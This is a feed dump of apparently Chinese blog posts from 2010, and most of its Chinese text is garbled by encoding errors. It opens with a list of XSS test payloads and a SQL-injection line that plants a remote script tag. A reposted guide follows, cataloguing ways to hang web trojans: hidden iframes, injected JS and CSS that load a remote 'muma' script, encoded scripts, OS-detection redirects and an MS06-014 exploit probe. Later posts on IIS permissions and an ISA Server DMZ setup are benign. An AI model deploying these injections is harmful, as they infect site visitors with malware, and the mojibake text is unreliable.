[4] >"'><img src="javascript:alert('Watchfire XSS Test Successful')">
[5] >"'><img src=javascript:alert(&quot;Watchfire XSS Test Successful&quot;)>

[6] " style="background:url(javascript:alert('Watchfire XSS Test Successful'))" OA="
[7] --><script>alert('Watchfire XSS Test Successful')</script>
[8] '+alert('Watchfire XSS Test Successful')+'
[9] "+alert('Watchfire XSS Test Successful')+"
[10] >'><%00script>alert('Watchfire XSS Test Successful')</script> (.NET 1.1 specific variant)
[11] >"><%00script>alert("Watchfire XSS Test Successful")</script> (.NET 1.1 specific variant)
[12] >+ACI-+AD4-+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-
[13] %A7%A2%BE%Bc%F3%E3%F2%E9%F0%F4%Be%E1%Ec%E5%F2%F4%A8%A7Watchfire%20XSS%20Test%20Successful%A7%A9%Bc%Af%F3%E3%F2%E9%F0%F4%Be

///-------------------------------------
exec('Updata ['+@t+'] set ['+@c+'] = rtrim(convert(varchar,['+#c+']))')  ???
cast("></title><script> src=http://www.xxx.com/xx.js</script><!-- as varchar(67))')f



灝忛粯 2010-05-15 07:50 鍙戣〃璇勮
]]>
銆愯漿銆戝父鐢ㄧ殑鎸傞┈鏂瑰紡鍜岀郴緇熷垽鏂瓑浠g爜http://m.shnenglu.com/momoxiao/archive/2010/05/15/115423.html灝忛粯灝忛粯Fri, 14 May 2010 23:49:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115423.htmlhttp://m.shnenglu.com/momoxiao/comments/115423.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115423.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/115423.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/115423.html涓:妗嗘灦鎸傞┈
<iframe src=鍦板潃 width=0 height=0></iframe>

浜?js鏂囦歡鎸傞┈
棣栧厛灝嗕互涓嬩唬鐮?br>document.write("<iframe width=0 height=0 src=鍦板潃></iframe>");
淇濆瓨涓簒xx.js錛?br>鍒橨S鎸傞┈浠g爜涓?br><script language=javascript src=xxx.js></script>

涓?js鍙樺艦鍔犲瘑
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt鍙敼鎴愪換鎰忓悗緙

鍥?body鎸傞┈
<body onload="window.location=鍦板潃;"></body>

浜?闅愯斀鎸傞┈
top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src=">;

鍏?css涓寕椹?br>body {
background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

涓?JAJA鎸傞┈
<SCRIPT language=javascript>
window.open ("鍦板潃","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

鍏?鍥劇墖浼
<html>
<iframe src="緗戦┈鍦板潃" height=0 width=0></iframe>
<img src="鍥劇墖鍦板潃"></center>
</html>

涔?浼璋冪敤錛?br><frameset rows="444,0" cols="*">
<frame src="鎵撳紑緗戦〉" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="緗戦┈鍦板潃" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

鍗?楂樼駭嬈洪獥
<a href="
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="緗戦┈鍦板潃";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

鍗佷竴:鍒ゆ柇緋葷粺浠g爜

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

鍗佷簩:鍒ゆ柇鏄惁鏈塵s06014浠g爜

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

鍗佷笁:鏅鴻兘璇誨彇js鐨勪唬鐮乨emo

//璇誨ǘsrc鐨勫璞?br>var v = document.getElementById("advjs");
//璇誨ǘsrc鐨勫弬鏁?br>var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

document.write("<iframe src="document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style="CURSOR: url(
document.writeln("style="CURSOR: url(

//鍒嗘瀽src鐨勫弬鏁板嚱鏁?br>function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

var loallPm = loU[1].split("&");

for (var i=0; i<loallPm.length; i++){
var loPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}



灝忛粯 2010-05-15 07:49 鍙戣〃璇勮
]]>
銆愯漿銆戞槸鍚﹁兘鍋氬埌涓婁紶鐩綍涓嶆墽琛孉SPhttp://m.shnenglu.com/momoxiao/archive/2010/04/30/114042.html灝忛粯灝忛粯Fri, 30 Apr 2010 03:05:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/30/114042.htmlhttp://m.shnenglu.com/momoxiao/comments/114042.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/30/114042.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/114042.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/114042.htmlOK.璁╂垜浠祴璇曚竴涓嬭繖鍙ヨ瘽鑳藉惁閫氳繃NTFS鏉冮檺鎺у埗鏉ュ仛鍒?br>
棣栧厛鎴戜滑鍐欎竴涓渶綆鍗曠殑ASP紼嬪簭.鎴戣繖閲岀敤浜嗘垜鑷繁鐨勪竴涓畝鍗曠殑鐧婚檰緋葷粺.
閲岄潰鍙坅sp.鏈夊澶栧紩鐢ㄧ殑閮ㄥ垎.鏈塧ccess鏁版嵁搴?br>鎴戜滑灝嗘潈闄愯緗垚
administrators  鍏ㄩ儴
system  鍏ㄩ儴
鐒跺悗涓昏鎴戜滑灝嗗娣誨姞鐨勪竴涓猠veryone鏉冮檺鏉ユ祴璇?
鍥犱負娌℃湁鍏朵粬鐢ㄦ埛緇勪簡.鎵浠user灝嗙戶鎵縠veryone緇勭殑鏉冮檺
鎵浠ユ槸涓嶆槸涓嶇敤everyone鐢╥user鐢ㄦ埛鏄竴鏍風殑.

棣栧厛鍙墦寮everyone鐢ㄦ埛鐨勮鍙栨潈闄?
鍦ㄩ珮綰у唴鏄劇ず濡備笅鏉冮檺
1.鍒楀嚭鏂囦歡澶?璇誨彇鏁版嵁
2.璇誨彇灞炴?br>3.璇誨彇鎵╁睍灞炴?br>鎵撳紑嫻嬭瘯欏甸潰鐧婚檰.姝e父

鐒跺悗楂樼駭鍐呭彧淇濈暀
1.鍒楀嚭鏂囦歡澶?璇誨彇鏁版嵁
鎵撳紑嫻嬭瘯欏甸潰.鍑虹幇ACL鐧婚檰妗嗕簡.鐪嬫潵鏉冮檺涓嶈凍

鍐嶆帴涓嬫潵鎴戜滑嫻嬭瘯浼犺涓殑鍙栨秷ASP鎵ц鏉冮檺.
鍥犱負鍙鎯呭喌涓嬪凡緇忔病鏈夋墽琛屾潈闄愪簡.
鎴戜滑鐜板湪鐗瑰埆灝嗘墽琛屾潈闄愬彇娑?br>1.閬嶅巻鏂囦歡澶?榪愯鏂囦歡 -- 鎷掔粷
2.鍒楀嚭鏂囦歡澶?璇誨彇鏁版嵁 -- 鍏佽
3.璇誨彇灞炴?-- 鍏佽
4.璇誨彇鎵╁睍灞炴?-- 鍏佽
鐜板湪鎵撳紑ASP嫻嬭瘯欏甸潰.浠嶆棫鍙互姝e父璁塊棶

鐢變簬asp鏂囦歡瀵逛簬iis鏉ヨ鍙槸涓涓枃鏈枃浠?br>IIS璇誨叆asp鏂囦歡鍐呭鍚庝氦鐢盿sp.dll榪涜瑙f瀽
鎵浠sp榪愯鏍規湰鍜寃indows搴旂敤紼嬪簭涓嶅悓
瀹屽叏涓嶉渶瑕佹墽琛屾潈闄?鍙渶瑕佸彧璇繪潈闄?br>鎵浠ヤ笉鍏佽asp榪愯,铏界劧鍙互鍋氬埌,灝辨槸鍙栨秷璇繪潈闄?br>浣嗘槸鍙栨秷璇繪潈闄愪箣鍚?鏁翠釜鐩綍鍐呮墍鏈夋枃浠墮兘灝嗘棤娉曢氳繃iis璇誨彇
鍖呮嫭鍥劇墖鏂囦歡絳夌瓑.閭d箞涓婁紶鐩綍涓嶅厑璁竌sp鎵ц.絳変簬鏄笂浼犵殑鎵鏈夊唴瀹歸兘涓嶈兘璇?br>榪欑璁劇疆灝嗗鑷翠笂浼犲唴瀹規鏃犳剰涔?

鏈鍚庢垜浠潵鐪嬭繖鍙ヨ瘽
"鑳芥墽琛孉SP鑴氭湰鐨勫湴鏂逛笉鍏佽鍐欏叆鏂囦歡,鑳藉啓鍏ユ枃浠剁殑鍦版柟涓嶅厑璁歌繍琛孉SP紼嬪簭"
鍓嶅崐鍙ユ垜浠彲浠ュ仛鍒?瀵筧sp鐩綍鍙鏉冮檺.
鍚庡崐鍙ヨ櫧鐒朵弗鏍兼潵璇翠篃鍙互鍋氬埌.瀵逛笂浼犵洰褰曞彇娑堣鏉冮檺
浣嗘槸榪欐牱灝嗗鑷翠笂浼犱換浣曟枃浠墮兘鏃犳硶璁塊棶.澶卞幓浜嗕笂浼犳枃浠跺姛鑳界殑鎰忎箟浜?

鏈漢嫻嬭瘯鐜
windows2003 涓枃浼佷笟鐗圴LK SP1
IIS 6
---------------------------------------------------------------------
鍐欐潈闄愪緷闈燦TFS鏉冮檺璁劇疆錛屾墽琛宎sp渚濋潬IIS璁劇疆
-------------------------------------------------------------------

灝忛粯 2010-04-30 11:05 鍙戣〃璇勮
]]>
銆愯漿銆戜嬌鐢↖SA Server 閮ㄧ講涓夊涓葷殑DMZ鍖哄煙錛堟湭瀹岋級http://m.shnenglu.com/momoxiao/archive/2010/04/27/113675.html灝忛粯灝忛粯Tue, 27 Apr 2010 01:23:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/27/113675.htmlhttp://m.shnenglu.com/momoxiao/comments/113675.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/27/113675.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/113675.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/113675.htmlhttp://www.microsoft.com/china/community/Column/72.mspx
-------------------------------------------------------------- 
榪欐絎旇呭皢浠嬬粛濡備綍鍦ㄤ紒涓氫腑鍒╃敤ISA Server閮ㄧ講涓涓狣MZ鍖哄煙銆備竴鑸潵璁插埄鐢↖SA Server鍙互瀹炵幇涓夊涓葷殑DMZ鍖哄煙錛屼篃鍙互瀹炵幇鑳岄潬鑳岀殑DMZ鍖哄煙銆傛湰鏂囪璁虹殑鐒︾偣鏄笁瀹夸富鐨凞MZ鍖哄煙銆?/p>

 棣栧厛錛屾垜浠皥璋堜負浣曡閮ㄧ講DMZ鍖哄煙錛屼篃灝辨槸璇翠竴鏃﹂儴緗蹭簡DMZ錛屼粬瀵逛綘鐨勭綉緇滀駭鐢熶粈涔堟牱鐨勭Н鏋佷綔鐢ㄣ傛湁浜涗紒涓氬彲鑳戒粠ISP鐢寵浜嗕竴涓湴鍧孌電殑IP錛屼絾鏄線寰鍑虹幇榪欎簺IP涓嶈兘鏈夋晥鐨勫埄鐢紝鏋勫緩浜咲MZ鍖哄煙鍚庯紝榪欎簺IP鍙互鐏墊椿鐨勫垎閰嶅埌DMZ涓婄殑涓繪満銆傛澶栵紝浠嶥MZ鍖哄煙鍒癐nternet嫻佸姩鐨勬暟鎹寘鏄璺敱鐨勶紝鑰屼笉鏄NAT錛屼粠ISA澶勭悊鏁版嵁鍖呯殑鏁堢巼瑙掑害璁詫紝鍓嶈呰浼樹簬鍚庤呫?br> 鐜板湪錛屾垜浠潵鐪嬬湅瑕侀儴緗睤MZ闇瑕佸摢浜涙潯浠?br> - ISA闇瑕佹湁鑷沖皯3涓綉緇滄帴鍙e崱
 - ISA Server鏄仛涓洪槻鐏妯″紡鎴栬呴泦鎴愭ā寮忓畨瑁呯殑錛屽彲浠ユ槸鍗曟満妯″紡涔熷彲浠ユ槸闃靛垪妯″紡
 - 鍦↖P PACKET Filter鐨勫叏灞璁劇疆涓紝蹇呴』鍚敤Enable IP Routing
 - ISP鍒嗛厤浜嗕竴涓湴鍧孌電殑IP緇欎綘鐨勫叕鍙?br> - 閰嶇疆鍦↖SA澶栭儴鎺ュ彛鐨処P鐨勫瓙緗戞帺鐮佷笉鑳戒笌DMZ鍖哄煙鐨勫瓙緗戞帺鐮佺浉鍚?/p>

 鍦ㄨ繖綃囨枃绔犻噷錛岀瑪鑰呬互涓涓ā鎷熺殑鐪熷疄鐜鏉ユ弿榪癉MZ錛岃瘯楠岀殑鎷撴墤濡傚浘1鎵紺恒?br>
(鍥?)
 鎴戜滑鍋囪錛屼綘鐨勫叕鍙鎬粠ISP璐拱浜嗕竴涓狢綾葷殑IP孌碉紝172.16.1.0/24銆傛垜浠皢172.16.1.33鍒嗛厤緇橧SA鐨勫閮ㄦ帴鍙c傛妸172.16.1.64/26浠?72.16.1.0/24鍒掑垎鍑烘潵鍒嗛厤緇橠MZ鍖哄煙銆傛敞鎰忥紝DMZ鍖哄煙鍜孖SA澶栭儴鎺ュ彛榪炴帴鐨勫尯鍩熸槸涓嶅悓鐨勯昏緫緗戠粶銆備竴涓父瑙佺殑閿欒鏄妸DMZ鍖哄煙鍜孖SA澶栭儴鎺ュ彛瑙勫垝鍦ㄤ竴涓狪P閫昏緫緗戠粶閲屻傝浣忥紝浠嶥MZ鍜屽閮ㄧ綉緇滅殑閫氳瑙掑害璁詫紝ISA鎵紨涓涓湁榪囨護鍔熻兘鐨勮礬鐢卞櫒錛岃屼笉鏄綉妗ワ紝榪欎篃鏄負浠涔堝繀闇瑕佸惎鐢‥nable IP Routing鐨勫師鍥犮?/p>

 ISA Server鐨勭綉緇滄帴鍙i厤緗涓?/p>

 Internal NIC
 IP:192.168.100.20/24
 Defaul Gateway(DG):None
 DNS:192.168.100.100

 DMZ NIC
 IP:192.168.100.65/26
 DG:None
 DNS:None

 External NIC
 IP:172.16.1.33/24
 DG:172.16.254
 DNS:10.10.10.10

 DMZ涓婄殑涓繪満鐨勭綉緇滄帴鍙i厤緗?br> IP:172.16.1.66-126/26
 DG:172.16.1.65
 DNS:None

 鍐呴儴緗戠粶錛圛nternal錛変笂鐨勮綆楁満
 IP:192.168.100.x/24
 DG:192.168.100.20
 DNS:192.168.100.100

 璇風壒鍒敞鎰忎互涓婄殑閰嶇疆銆傚浜嶪SA鏉ヨ錛岀己鐪佺綉鍏充竴瀹氳閰嶇疆鍦ㄥ閮ㄦ帴鍙o紝鍘熷洜寰堢畝鍗曪紝涓涓幓寰鏈煡IP鐨勬暟鎹寘錛岀洰鏍囦竴瀹氫綅浜嶪nternet涓婏紝濡傛灉榪欎釜IP鏄湪浣犵殑鍏徃鍐呴儴緗戠粶錛岄偅涔堜綘鐨勭綉緇滀腑鐨勮礬鐢辮緗偗瀹氬瓨鍦ㄩ棶棰樸傛棦鐒舵槸鍘誨線Internet涓婄殑錛孖SA蹇呴』鍙互灝嗚繖涓暟鎹寘浠庡閮ㄦ帴鍙d笂閫佸嚭鍘伙紝鎵浠ョ己鐪佺綉鍏充竴瀹氳閰嶇疆鍦ㄥ閮ㄦ帴鍙d笂銆傚鏋滀綘鐨勫叾浠栨帴鍙d篃閰嶇疆鐨勭己鐪佺綉鍏籌紝閭d箞灝變竴瀹氫細鍑虹幇闂錛屽洜涓洪粯璁ゆ儏鍐典笅錛屽悇涓綉緇滄帴鍙d笂閰嶇疆鐨勭己鐪佺綉鍏崇殑Metric閮芥槸1錛屾墍浠ュ幓寰鏈煡IP鐨勬暟鎹寘錛屽氨浼氫粠鎵鏈夐厤緗簡緙虹渷緗戝叧鐨勭綉鍗¢佸嚭錛屼篃灝辨槸璐熻澆鍧囪 錛屼絾鏄彟涓涓笉搴旇閰嶇疆緙虹渷緗戝叧鐨勭綉鍗′笉鑳藉皢鏁版嵁鍖呮垚鍔熺殑閫佸埌鐩殑IP錛屾墍浠ュ鑷翠涪鍖咃紝鐢氳嚦鏃犳硶閫氳銆傚唴閮ㄦ帴鍙g殑DNS鎸囧悜鍏徃鍐呴儴鐨凞NS鏈嶅姟鍣ㄣ傚閮ㄦ帴鍙g殑DNS鎸囧悜涓涓彲浠ヨВ鏋怚nternet涓婃墍鏈夊煙鍚嶇殑DNS鏈嶅姟鍣紝榪欎竴鐐瑰緢閲嶈錛屽埆蹇樹簡ISA瑕佷唬鐞哤eb Proxy Client鍜孎WC榪涜DNS瑙f瀽銆侱MZ鎺ュ彛涓婏紝鎴戜滑騫舵病鏈夐厤緗瓺NS錛屽綋鐒朵綘涔熷彲浠ラ厤緗傚浜嶥MZ鍖哄煙涓婄殑涓繪満錛屾垜浠妸緗戝叧鎸囧悜ISA鐨凞MZ緗戠粶鎺ュ彛錛屽洜涓篋MZ鍖哄煙涓婄殑涓繪満闇瑕佷笌Internet閫氳錛岀‘鍒囩殑璁叉槸琚獻nternet鐢ㄦ埛璁塊棶錛岃孖SA鏄疘nternet鍑哄彛鐨勬寔鏈夎呫侱NS鎸囧悜鎴戜滑涔熸病鏈夊湪DMZ涓婄殑涓繪満閰嶇疆錛屽洜涓篋MZ搴旇鏄竴涓棤浜哄尯錛屼篃灝辨槸璇碊MZ涓婂簲璇ユ槸涓涓湇鍔″櫒鍐滃満錛岃屼笉鏄鐢ㄦ埛浣跨敤錛屾祻瑙圛nternet鐨勮綆楁満錛屾墍浠ュ畠娌℃湁蹇呰閰嶇疆DNS錛岄櫎闈炴煇鍙版湇鍔″櫒榪愯鐨勬湇鍔″繀欏諱緷璧栦笌DNS銆傚唴閮ㄧ綉緇滅殑涓繪満璁劇疆涓嶆槸姝ゆ枃璁ㄨ鐨勯噸鐐癸紝鎵浠ュ湪榪欓噷涓嶅睍寮璁ㄨ銆?br> 鍙﹀錛屽鏋滀綘瀵硅礬鐢遍潪甯鎬簡瑙o紝浠庝笂杈圭粰鍑虹殑ISA鐨勭綉緇滄帴鍙i厤緗湅錛屼綘椹笂浼氬彂鐜頒竴涓棶棰樸侷SA澶栫綉鎺ュ彛榪炴帴172.16.1.0/24緗戞銆佽孌MZ鍖哄煙鍦?72.16.1.64/26緗戞銆傛垜浠亣璁捐繖涓や釜緗戞鐨勭墿鐞嗕粙璐ㄦ槸浠ュお緗戞爣鍑嗭紝褰?72.16.1.64/26緗戞涓殑鏌愪釜涓繪満鍙戣搗鍜?72.16.1.0/24緗戞涓煇鍙頒富鏈洪氳鏃訛紝涓嶅Θ鍋囪172.16.1.69/26鍜?72.16.1.254/24閫氳錛屽浜?72.16.1.69/26錛屽畠璁や負172.16.1.254/24鍜岃嚜宸變笉鍚屽睘涓涓昏緫緗戞錛屾墍浠ュ畠鐭ラ亾瑕佹妸鍘誨線172.16.1.254/24鐨勬暟鎹寘鍙戦佺粰鑷繁鐨勭綉鍏?72.16.1.65/26錛岀敱浜?72.16.1.69/26鍜?72.16.1.65/26鍦ㄤ竴涓箍鎾煙錛屾墍浠RP瑙f瀽涓嶄細鍑虹幇闂銆備絾鏄弽榪囨潵錛屽綋172.16.1.254/24瑕佽礬鐢辨垨鑰呭鍙戜竴涓暟鎹寘鍒?72.16.1.69/26鏃訛紝闂灝卞嚭鐜頒簡銆傚浜?72.16.1.254/24鏉ヨ錛屽畠璁や負172.16.1.69鍜岃嚜宸卞湪涓涓昏緫緗戞錛屾墍浠ヨ繖涓暟鎹寘搴旇鏄洿鎺ュ彂閫佸埌172.16.1.69/26錛屽洜姝ゅ畠灝變細ARP瑙f瀽172.16.1.69/26鐨凪AC鍦板潃錛岀劧鑰屽畠浠茍涓嶅湪鍚屼竴涓箍鎾煙錛屾墍浠ヨ繖涓狝RP瑙f瀽寰椾笉鍒扮瓟妗堬紝鍥犳榪欎釜鏁版嵁鍖呭氨鏃犳硶鍙戦侊紝鐒惰岋紝濡傛灉172.16.1.254/24鍙互鎴愬姛鐨勬妸鍘誨線172.16.1.69/26鐨勬暟鎹寘鍙戦佺粰172.16.1.33/24錛屼篃灝辨槸ISA Server錛屽垯榪欎釜鏁版嵁鍖呭氨鍙互琚渶緇堥佸線172.16.1.69/26銆傝瑙e喅榪欎釜闂錛屾垜浠簲璇ヤ粠涓や釜鏂歸潰鍑哄彂銆傚鏋淚SA Server榪炴帴ISP鐨勯摼璺眰鍗忚鏄氳繃騫挎挱鎶鏈鍧鐨勶紝鍒欒В鍐崇殑鏂規硶鏈?縐嶏紝涓鏄紝涓庝綘鐨処SP鑱旂郴錛屼嬌寰楀拰ISA鐩歌繛鐨勮礬鐢卞櫒涓湁涓鏉℃槑紜殑鍒?72.16.1.64/26緗戠粶涓嬩竴璺充負172.16.1.33/24鐨勮礬鐢憋紱浜屾槸錛屽湪ISA涓婂疄鏂戒竴縐嶅浜庨摼璺眰瀵誨潃鐨勬楠楁墜孌碉紝渚嬪錛屼互澶綉鐨勯摼璺眰瀵誨潃鏄氳繃ARP鍗忚錛屾墍浠ヤ綘鐨処SA璁$畻鏈轟笂蹇呴』鍙互瀹炵幇Proxy ARP鍔熻兘錛屼嬌寰桰SA璁$畻鏈哄彲浠ヤ互鑷繁澶栫綉鎺ュ彛鐨凪AC鍦板潃鍥炲簲瀵?72.16.1.64/26緗戠粶涓富鏈虹殑ARP鏌ヨ錛涗笁鏄紝鎶?72.16.1.0/24鍜?72.16.1.64/26緗戠粶瑙勫垝鍒頒竴涓箍鎾煙涔嬩腑錛屽鏋滈噰鐢ㄨ繖縐嶆柟娉曪紝璇鋒敞鎰廔SA鍙兘鍋?#8220;鍗婅繃婊?#8221;鏉ヤ繚鎶MZ鍖哄煙錛屼絾鏄繖縐嶄繚鎶や篃鏄湁鏁堢殑銆傛崲鍙ユ祬鏄炬槗鎳傜殑璇濊錛屼粠澶栫綉鍒癉MZ鍖哄煙鐨勬暟鎹寘鏄洿鎺ュ彂閫佺殑錛屼絾鏄粠DMZ鍖哄煙鍒板緗戠殑鏁版嵁鍖呮槸緇忕敱ISA Server閫佸嚭鍒板緗戠殑銆傚鏋滐紝ISA Server榪炴帴ISP鐨勯摼璺眰鍗忚鏄偣瀵圭偣鐨勶紝閭d箞浣犱笉鐢ㄥ仛浠諱綍浜嬫儏錛屽洜涓哄彧瑕佹槸鍘誨線172.16.1.x鐨勬暟鎹寘錛屼笉璁哄瓙緗戞帺鐮佹槸24浣嶈繕鏄?6浣嶈繕鏄?7浣嶏紝鏁版嵁鍖呴兘浼氭紜棤璇殑鍙戦佸埌浣犵殑ISA Server鐨勫緗戞帴鍙c傚湪絎旇呯殑嫻嬭瘯鐜涓紝ISA鍜孖SP鐨勮礬鐢卞櫒涔嬮棿鐨勯摼璺眰鍗忚鏄互澶綉錛岀瑪鑰呭榪欎釜璺敱鍣ㄦ湁綆$悊鏉冨姏錛屾墍浠ラ噰鐢ㄤ簡鍦ㄨ礬鐢卞櫒涓婃坊鍔犺礬鐢辯殑鏂規硶瑙e喅涓婅堪闂銆?/p>

 璇峰湪浣犲畨瑁匢SA Server涔嬪墠錛屽皢榪欎簺閰嶇疆璁劇疆濂姐備竴鏃﹀畨瑁呭ソISA Server錛屽湪ISA璁$畻鏈轟笂娣誨姞鎴栬呭垹闄ょ綉鍗″彲鑳戒細寮曡搗鎰忔兂涓嶅埌鐨勯敊璇傛澶栵紝鏈濂藉湪瀹夎濂絀SA Server鍚庯紝涓嶈淇敼IP鐨勯厤緗紝濡傛灉浣犱笉寰椾笉榪欐牱鍋氾紝璇烽伒寰互涓嬫楠わ細
 1錛?鍦ㄥ懡浠よ涓緭鍏et stop mspfltex
 2錛?鍦ㄥ懡浠よ涓緭鍏et stop gksvc
 3錛?鍦ㄥ懡浠よ涓緭鍏et stop IPNAT
 4錛?淇敼鐩稿簲緗戝崱鐨処P璁劇疆
 5錛?鍦ㄥ懡浠よ涓緭鍏et start mspfltex
 6錛?鍦ㄥ懡浠よ涓緭鍏et start IPNAT
 7錛?鍦ㄥ懡浠よ涓緭鍏et start isactrl
 8錛?鍦ㄥ懡浠よ涓緭鍏et start “Microsoft Web Proxy”
 9錛?鍦ㄥ懡浠よ涓緭鍏et start “Microsoft Firewall”
 10錛屽湪鍛戒護琛屼腑杈撳叆net start “Microsoft Scheduled Cache Content Download”

 涓轟簡楠岃瘉緗戠粶灞傜殑榪為氭э紝鎴戜滑閫氬父浼氫嬌鐢≒ing宸ュ叿銆侾ing宸ュ叿瀹為檯涓婃槸ICMP鍗忚鐨勪竴縐嶅簲鐢ㄥ疄渚嬨備負浜嗗疄鐜扮洰鐨勶紝浣犻渶瑕佸ICMP鍗忚鏈変竴浜涗簡瑙c傚綋涓鍙頒富鏈篜ing涓涓繙绔綆楁満鏃訛紝浼氫互ICMP鍗忚 綾誨瀷8 浠g爜0錛堜篃灝辨槸閫氬父鎵璇寸殑ICMP Ping Query鎴栬呮槸ICMP Ping Request錛夊皝瑁呬竴涓暟鎹寘鍙戦佸嚭鍘伙紝褰撹繙绔綆楁満鏀跺埌榪欎釜鏁版嵁鍖呭悗錛屼細浠CMP 鍗忚綾誨瀷0浠g爜0灝佽錛圛CMP Ping Reply錛夊洖搴旂殑鏁版嵁鍖呭彂閫佺粰婧愮銆備負浜嗕嬌DMZ涓婄殑涓繪満鍙互Ping閫欼nternet涓婄殑涓繪満錛屼綘闇瑕佸厑璁窪MZ涓繪満鍙戦佺殑ICMP Ping Query鑳藉琚獻SA Server鍙戦佸埌Internet涓婏紝鍙嶈繃鏉ワ紝瑕佸厑璁窱CMP Ping Reply榪涘叆鍒癉MZ鍖哄煙銆傝繖闇瑕佷綘鍦↖P PACKET FILTER涓緩绔?涓皝鍖呰繃婊わ紝鍏蜂綋鍐呭濡傚浘2錛嶅浘9銆?br>
 瀹屾垚涔嬪悗錛岀瓑寰呬竴浼氬効浠ヤ究鏂板緩鐨勫皝鍖呰繃婊ょ敓鏁堬紝涔熷彲浠ラ噸鏂板惎鍔ㄤ竴涓婩irewall Service鏈嶅姟銆備箣鍚庨獙璇丏MZ鐨勪富鏈烘槸鍚﹀彲浠ing閫欼nternet涓婄殑涓繪満錛堜篃灝辨槸鎴戜滑妯℃嫙鐨?0.10.10.10閭e彴璁$畻鏈猴級銆傛病鏈夐棶棰橈紝DMZ鍜孖nternet鐨勭綉緇滃眰紜疄鍏鋒湁榪為氭э紝浣嗘槸鍙嶈繃鏉?0.10.10.10鍗存棤娉昉ing閫欴MZ涓婄殑涓繪満錛屼篃璁歌繖鎭板閥鏄綘鐨勬効鏈涖傚鏋滀綘甯屾湜Internet鐨勪富鏈哄彲浠ing閫欴MZ鐨勪富鏈猴紝涔熷緢綆鍗曪紝鍙鎶婂垰鎵嶅緩绔嬬殑2涓皝鍖呰繃婊ょ殑Direction 璁劇疆涓築oth鍗沖彲錛屽師鐞嗕笉鍐嶅啑榪般傝鍒拌繖閲岋紝濡傛灉浣犲笇鏈汭nternet涓婄殑璁$畻鏈哄彲浠ing閫氫綘鐨処SA Server鐨勫閮ㄦ帴鍙o紝灝變細鍙樺緱鏋佸叾綆鍗曪紝絎旇呬篃灝變笉蹇呮氮璐圭瑪澧ㄣ傚煎緱娉ㄦ剰鐨勬槸浣犱笉闇瑕佹坊鍔?涓皝鍖呰繃婊わ紝鑰屾槸1涓紝濡傛灉浣犳敞鎰忓埌IP PACKET FILTER涓紝宸茬粡鏈夐粯璁ょ殑鍚嶄負ICMP outbound鐨勫皝鍖呰繃婊ゅ氨涓嶉毦鐞嗚В錛岃繖涓皝鍖呰繃婊ゅ厑璁窱CMP 鎵鏈夌被鍨嬪拰浠g爜鐨勬暟鎹寘浠嶪SA鐨勫閮ㄦ帴鍙i佸嚭錛屼篃灝辨槸璇翠綘鍙渶涓鴻繘鍏ョ殑ICMP Ping Query璁劇疆涓涓厑璁哥殑灝佸寘榪囨護鍗沖彲銆傚鏋滀綘鎯充簡瑙CMP鍗忚鐨勬洿澶氱粏鑺傦紝鍙互鍙傝僒echNet CD鎴栬呭井杞府鍔╃珯鐐逛腑鐨凲170292鏂囨。銆?/p>

